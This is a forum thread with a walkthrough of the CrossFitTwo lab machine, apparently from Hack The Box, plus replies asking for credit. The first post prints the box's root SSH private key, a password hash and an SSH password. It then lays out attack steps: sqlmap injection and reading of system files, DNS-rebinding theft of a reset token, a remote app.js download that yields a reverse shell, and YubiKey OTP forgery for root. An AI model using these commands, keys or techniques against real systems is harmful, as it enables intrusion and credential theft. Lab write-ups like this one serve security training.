FLAG Crossfittwo
by xFranky - May 03, 2021 at 10:02 AM
#1
i put here the write but i would like to help me with coins

also if u need something check here : https://shoppy.gg/@DarkHack







10.10.10.232



================= [ ALL REQUIRED FILES ] ====================



root id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----

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

-----END OPENSSH PRIVATE KEY-----







exploit.py

https://pastebin.com/sp3KL0LN





app.js

https://pastebin.com/M58anuzS





message.sh

https://pastebin.com/aXhZdfSz





john.sh

https://pastebin.com/eKLDkPXi





master.passwd

root:$2b$10$l5rjbTPLRlLAQzJ1brEg/eE9qtleDvcMXBlP3F6tdRytQ3QLXNZa.:0:0:daemon:0:0:Charlie &:/root:/bin/ksh





David ssh

david:NWBFcSe3ws4VDhTB



================= [ WRITEUP ] =====================

1) -- Portscan --



# Nmap 7.91 scan initiated Thu Mar 25 14:03:07 2021 as: nmap -Pn -sV -A -p- --min-rate=10000 -oN Crossfit2.nmap 10.10.10.232

Warning: 10.10.10.232 giving up on port because retransmission cap hit (10).

Nmap scan report for 10.10.10.232

Host is up (0.046s latency).

Not shown: 61643 filtered ports, 3890 closed ports

PORT  STATE SERVICE    VERSION

22/tcp open  tcpwrapped

| ssh-hostkey:

|  3072 35:0a:81:06:de:be:8c:d8:d7:27:66:db:96:94:fd:52 (RSA)

|  256 94:60:55:35:9a:1a:a8:45:a1:ae:19:cd:61:05:ec:3f (ECDSA)

|_  256 a2:c8:6b:6e:11:b6:70:69:db:d2:60:2e:2f:d1:2f:ab (ED25519)

80/tcp open  tcpwrapped

|_http-server-header: OpenBSD httpd

|_http-title: CrossFit

PORT    STATE SERVICE            VERSION

8953/tcp open  ssl/ub-dns-control?



--------------------------------------------------------------------------------------------





2) -- Directory Enum --



dirsearch -u http://10.10.10.232 -e * dirsearch -u http://employees.crossfit.htb -e *



-- Result: http 200 --



http://10.10.10.232/css/

http://10.10.10.232/fonts/

http://10.10.10.232/img/

http://10.10.10.232/images/

http://10.10.10.232/index.php

http://10.10.10.232/index.php/login/

http://10.10.10.232/js/

http://10.10.10.232/readme.txt

http://employees.crossfit.htb/

http://employees.crossfit.htb/package-lock.json

http://employees.crossfit.htb/js/

/index.php

/index.php/login/

http://employees.crossfit.htb/css/

http://employees.crossfit.htb/password-reset.php

http://employees.crossfit.htb/password-reset.php?token=

http://gym.crossfit.htb



/images              (Status: 301) [Size: 510] [--> http://10.10.10.232/images/]

/js                  (Status: 301) [Size: 510] [--> http://10.10.10.232/js/]

/css                  (Status: 301) [Size: 510] [--> http://10.10.10.232/css/]

/img                  (Status: 301) [Size: 510] [--> http://10.10.10.232/img/]

/blog.php            (Status: 200) [Size: 15369]

/contact.php          (Status: 200) [Size: 8007]

/classes.php          (Status: 200) [Size: 25946]

/index.php            (Status: 200) [Size: 19041]

/fonts                (Status: 301) [Size: 510] [--> http://10.10.10.232/fonts/]

/about-us.php        (Status: 200) [Size: 15733]

/elements.php        (Status: 200) [Size: 19654]

/vendor              (Status: 301) [Size: 510] [--> http://10.10.10.232/vendor/]

/lgn                  (Status: 301) [Size: 510] [--> http://10.10.10.232/lgn/]

/index.php            (Status: 200) [Size: 19041]

---------------------------------------------------------------------------------



modify etc/hosts --->



10.10.10.232 crossfit.htb employees.crossfit.htb gym.crossfit.htb







3) -- Test Websockets --



python3 -m websockets ws://gym.crossfit.htb/ws/



{"status":"200","message":"Hello! This is Arnold, your assistant. Type 'help' to see available commands.","token":"66c7fa72f1cab3e94d71139f8f21d8fe0ecd8b70ab0cace356cd7bdb2cfbd1bf"}



Available commands:

- coaches

- classes

- memberships ---> vulnerable parameter "params"



---------------------------------------------------------------------------------##





4) -- Exploit sqli --



WORKED!! ##



- Run script exploit.py:



python3 exploit.py



└─# python3 exploit.py

* Serving Flask app "exploit" (lazy loading)

* Environment: production

  WARNING: This is a development server. Do not use it in a production deployment.

  Use a production WSGI server instead.

* Debug mode: off

* Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)

------------------------------------------------------------------------------------





-- Vulnerable parameter at sqli: "params" --



-- Run sqlmap on localhost:5000 which will proxyes to the WebSocket ws://gym.crossfit.htb/ws/ --



sqlmap -u http://127.0.0.1:5000/?id=1  --dbs --level 5 --risk 3



sqlmap -u http://127.0.0.1:5000/?id=1  --level 5 --risk 3 -D "employees" -T employees -C username --dump



sqlmap -u http://127.0.0.1:5000/?id=1  --level 5 --risk 3 -D "employees" -T employees -C password --dump



sqlmap -u http://127.0.0.1:5000/?id=1  --level 5 --risk 3 -D "employees" -T employees -C email --dump



sqlmap -u http://127.0.0.1:5000/?id=1  --level 5 --risk 3 -D "employees" -T employees -C email,token --dump --fresh-queries --threads 10



------------------------------------------------------------------



-- Results of the dump of the columns of the Employes db --



Database: employees                                                                                                                                               

Table: employees

[4 entries]

+---------------+

| username      |

+---------------+

| administrator |

| jparker      |

| mwilliams    |

| wsmith        |

+---------------+



Database: employees

Table: employees

[4 entries]

+------------------------------------------------------------------+

| password                                                        |

+------------------------------------------------------------------+

| 06b4daca29092671e44ef8fad8ee38783b4294d9305853027d1b48029eac0683 |

| 4de9923aba6554d148dbcd3369ff7c6e71841286e5106a69e250f779770b3648 |

| fe46198cb29909e5dd9f61af986ca8d6b4b875337261bdaa5204f29582462a9c |

| fff34363f4d15e958f0fb9a7c2e7cc550a5672321d54b5712cd6e4fa17cd2ac8 |

+------------------------------------------------------------------+



Database: employees                                                                                                                                               

Table: employees

[4 entries]

+-----------------------------+

| email                      |

+-----------------------------+

| [email protected]  |

| [email protected]    |

| [email protected] |

| [email protected]    |

+-----------------------------+





5) -- Data Exfiltration with function of sqlmap--



The data exfiltrated with sqlmap can be found here ----> /root/.local/share/sqlmap/output/127.0.0.1/files





-- First let's run this script --



python3 exploit.py ----> which will proxyes to the WebSocket ws://gym.crossfit.htb/ws/





sqlmap -u http://127.0.0.1:5000/?id=1  --level 5 --risk 3 -D "crossfit" -T "membership_plans" -C "password" --file-read /etc/httpd.conf

sqlmap -u http://127.0.0.1:5000/?id=1  --level 5 --risk 3 -D "crossfit" -T "membership_plans" -C "password" --file-read /etc/passwd

sqlmap -u http://127.0.0.1:5000/?id=1  --level 5 --risk 3 -D "crossfit" -T "membership_plans" -C "password" --file-read /var/unbound/etc/unbound.conf

sqlmap -u http://127.0.0.1:5000/?id=1  --level 5 --risk 3 -D "crossfit" -T "membership_plans" -C "password" --file-read /var/unbound/etc/tls/unbound_server.key

sqlmap -u http://127.0.0.1:5000/?id=1  --level 5 --risk 3 -D "crossfit" -T "membership_plans" -C "password" --file-read /var/unbound/etc/tls/unbound_control.pem

sqlmap -u http://127.0.0.1:5000/?id=1  --level 5 --risk 3 -D "crossfit" -T "membership_plans" -C "password" --file-read /var/unbound/etc/tls/unbound_control.key

sqlmap -u http://127.0.0.1:5000/?id=1  --level 5 --risk 3 -D "crossfit" -T "membership_plans" -C "password" --file-read /var/unbound/etc/tls/unbound_server.pem

sqlmap -u http://127.0.0.1:5000/?id=1  --level 5 --risk 3 -D "crossfit" -T "membership_plans" -C "password" --file-read /etc/relayd.conf







6) -- Part Configuration Unbound --



Put all certificates on path -----> /etc/unbound on your machine





In the unbound.conf file comment all the server part and change with the current path of the certificates exfiltrated from the box



the file unbound.conf it must look like this:



-------------------------------------------------------------

remote-control:

    control-enable: yes

    control-interface: 0.0.0.0

    control-use-cert: yes

    server-key-file: "/etc/unbound/unbound_server.key"

    server-cert-file: "/etc/unbound/unbound_server.pem"

    control-key-file: "/etc/unbound/unbound_control.key"

    control-cert-file: "/etc/unbound/unbound_control.pem"

    server-key-file: "/etc/unbound/unbound_server.key"

--------------------------------------------------------------





Run this control command:



unbound-control -c path where put unbound.conf before exfiltrated /my_unbound.conf -s [email protected] status



version: 1.11.0

verbosity: 1

threads: 1

modules: 2 [ validator iterator ]

uptime: 46 seconds

options: control(ssl)

unbound (pid 9554) is running...





------------------------------------------------------------------------------------------------







7) -- Part DNS Rebinding --



## there is a misconfig in the conf file as there is a wildcard before the domain name and we can use this to our advantage ##



-- Exploit Misconfig on relayd.conf



    pass request quick header "Host" value "*crossfit-club.htb" forward to <3>

    pass request quick header "Host" value "*employees.crossfit.htb" forward to <2>





Found New Domain:



## http://crossfit-club.htb  ##



xemployees.crossfit.htb ----> domain to add to the file /etc/hosts



Forward dns traffic via this command:



unbound-control -c my_unbound.conf -s [email protected] forward_add +i fuckemployees.crossfit.htb. <your_ip>@53



Utilizzare un fake dns con questo comando:



i=0; dnschef -i <your_ip --fakedomains xemployees.crossfit.htb --fakeip 127.0.0.1 2>&1 | while read line; do case "$line" in *cooking*) (( i++ )); echo $i;  [[ "$i" -gt 1 ]]  && pkill -f dnschef;; esac; done; dnschef -i <your_ip --fakedomains xemployees.crossfit.htb --fakeip <your_ip



Listen on netcat:

nc -nlvp 80



Token receveid:

connect to [<your_ip] from (UNKNOWN) [10.10.10.232] 39907

GET /password-reset.php?token=9bb1cc830641bde976969ef85edc3f78b108c344bdbc0355b30749d5895803691a2f50a2534258fbb471f05fe4124bfda4d92bb1dd833a3aa8db4e9250055fc1 HTTP/1.1

Host: fuckemployees.crossfit.htb

User-Agent: Mozilla/5.0 (X11; OpenBSD amd64; rv:82.0) Gecko/20100101 Firefox/82.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: keep-alive

Referer: http://crossfit-club.htb/

Upgrade-Insecure-Requests: 1



----------------------------------------------------------------



-- Enumeration crossfit-club.htb --



---- Scanning URL: http://crossfit-club.htb/ ----

+ http://crossfit-club.htb/chat (CODE:200|SIZE:4069)                                                                                                             

+ http://crossfit-club.htb/favicon.ico (CODE:200|SIZE:58784)                                                                                                     

+ http://crossfit-club.htb/home (CODE:200|SIZE:4069)                                                                                                             

+ http://crossfit-club.htb/index.html (CODE:200|SIZE:4069)                                                                                                       

+ http://crossfit-club.htb/login (CODE:200|SIZE:4069)







8) --- David User Part --



start Apache2:



service apache2 start



Install:

apt-get install uuid-runtime



-- And run script ./message.sh



Then after 2 minutes:



cat /var/log/apache2/access.log| grep -i david



SSH creds:

david:NWBFcSe3ws4VDhTB



cat access.log --->





10.10.10.232 - - [01/Apr/2021:14:13:06 -0400] "GET /RECV?data={%22sender_id%22:2,%22content%22:%22Hello%20David,%20I%27ve%20added%20a%20user%20account%20for%20you%20with%20the%20password%20NWBFcSe3ws4VDhTB.%22,%22roomId%22:2,%22_id%22:3075} HTTP/1.1" 404 490 "http://employees-crossfit.htb/a2ba575503da.html" "Mozilla/5.0 (X11; OpenBSD amd64; rv:82.0) Gecko/20100101 Firefox/82.0"





ssh [email protected]



and then type sh to get a more usable shell









9) -- Privesc for user John --



script app.js to be replaced with the original one that will be recalled by the user john --->





Formatted script for unix



dos2unix app.js



- And then we execute these commands, quickly because there is autoclean:



cd /opt/sysadmin

mkdir node_modules

cd node_modules

cp -r /usr/local/lib/node_modules/log-to-file .

cd log-to-file

rm app.js

wget <Your_IP>/app.js



or used my script john.sh--



wget <Your_IP>/john.sh

chmod +x john.sh

./john.sh



nc -nlvp 4444



--- And we have the shell with john!!!!





10) -- Privesc Root Part --





--Enum



find / -type f -perm -4000 -ls 2>/dev/null

1425624  52 -r-sr-xr-x    3 root    bin        26552 Oct  5 00:47 /usr/bin/chfn

1425624  52 -r-sr-xr-x    3 root    bin        26552 Oct  5 00:47 /usr/bin/chpass

1425624  52 -r-sr-xr-x    3 root    bin        26552 Oct  5 00:47 /usr/bin/chsh

1425650  56 -r-sr-xr-x    1 root    bin        27464 Oct  5 00:47 /usr/bin/doas

1425715  60 -r-sr-sr-x    1 root    daemon      29936 Oct  5 00:47 /usr/bin/lpr

1425716  52 -r-sr-sr-x    1 root    daemon      24880 Oct  5 00:47 /usr/bin/lprm

1425743  44 -r-sr-xr-x    1 root    bin        20936 Oct  5 00:47 /usr/bin/passwd

1425809  36 -r-sr-xr-x    1 root    bin        17216 Oct  5 00:47 /usr/bin/su

1478072  20 -r-sr-xr-x    1 root    bin          8880 Oct  5 00:47 /usr/libexec/lockspool

1478095  960 -r-sr-xr-x    1 root    bin        466608 Oct  5 00:47 /usr/libexec/ssh-keysign

1481580  20 -rwsr-s---    1 root    staff        9024 Jan  5 13:04 /usr/local/bin/log

1503426  48 -r-sr-sr-x    2 root    authpf      23000 Oct  5 00:47 /usr/sbin/authpf

1503426  48 -r-sr-sr-x    2 root    authpf      23000 Oct  5 00:47 /usr/sbin/authpf-noip

1503506  288 -r-sr-x---    1 root    network    146208 Oct  5 00:47 /usr/sbin/pppd

1503559  64 -r-sr-xr-x    2 root    bin        32712 Oct  5 00:47 /usr/sbin/traceroute

1503559  64 -r-sr-xr-x    2 root    bin        32712 Oct  5 00:47 /usr/sbin/traceroute6

362927  736 -r-sr-xr-x    2 root    bin        356768 Oct  5 00:47 /sbin/ping

362927  736 -r-sr-xr-x    2 root    bin        356768 Oct  5 00:47 /sbin/ping6

362934  576 -r-sr-x---    1 root    operator  275928 Oct  5 00:47 /sbin/shutdown



setuid:

1481580  20 -rwsr-s---    1 root    staff        9024 Jan  5 13:04 /usr/local/bin/log







11) -- exploit /usr/local/bin/log for read file not permitted with John --





Found root keys and root id_rsa ---> save in the files, we will need them later to get a rooted ssh shell:



/usr/local/bin/log /var/db/yubikey/root.key

6bf9a26475388ce998988b67eaa2ea87 ----> root.key



/usr/local/bin/log /var/db/yubikey/root.uid

a4ce1128bde4 ----> root.uid





/usr/local/bin/log /var/db/yubikey/root.ctr

985089 ----> root.ctr



/usr/local/bin/log /var/backups/root_.ssh_id_rsa.current



chmod 600 id_rsa





-- Download software -------> https://developers.yubico.com/yubico-c/



extract tar.gz file and...



sudo apt-get install libtools

sudo apt-get install dh-autoreconf

sudo autoreconf --install

sudo apt-get install asciidoc-base

./configure

make check

sudo make install



12) --- Generate Yubikey password and root shell---


./ykgenerate cat root.key  cat root.uid  $(printf "%06x" $(expr $(cat root.ctr) + 1) | sed 's/..$//g') c0a8 00 $(printf "%06x" $(expr $(cat root.ctr) + 1) | sed 's/^....//g')

drugnrenllteribiibulbvenukcitnbv


Hidden Content
You must register or login to view this content.
Reply
#2
why people take and dont give me a respect or some coins for give free a insane machine :( bad guys no support no more free :((( sorry bad day
Reply
#3
Hey Frank, excellent write up. Keep it up.
 Thanks and Respect.
Reply
#4
thanks buddy for the excellent write up keep up the good work. +rep for you :D
Reply
#5
thanks guys for respect i appreciate that thanks guys
Reply
#6
Franky need some help with dnschef portion of the writeup can get that command to work for me and I am also new to this whole DNS CHEF and DNS Rebinding thing read a couple of articles so can you explain it in bit more detail. Thank you in advance
Reply
#7
i think this ben explained, and understandable, so if you need explanation, i think you have enough information to be able to do it yourself, that if i give the machine for free and above i have to become professor of free ....... that's not funny
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
FLAG CrossFitTwo - Detailed Writeup + All Files burjukakabubu 5 1,863 April 15, 2021 at 10:49 PM
Last Post: umerkhan

 Users browsing this thread: 1 Guest(s)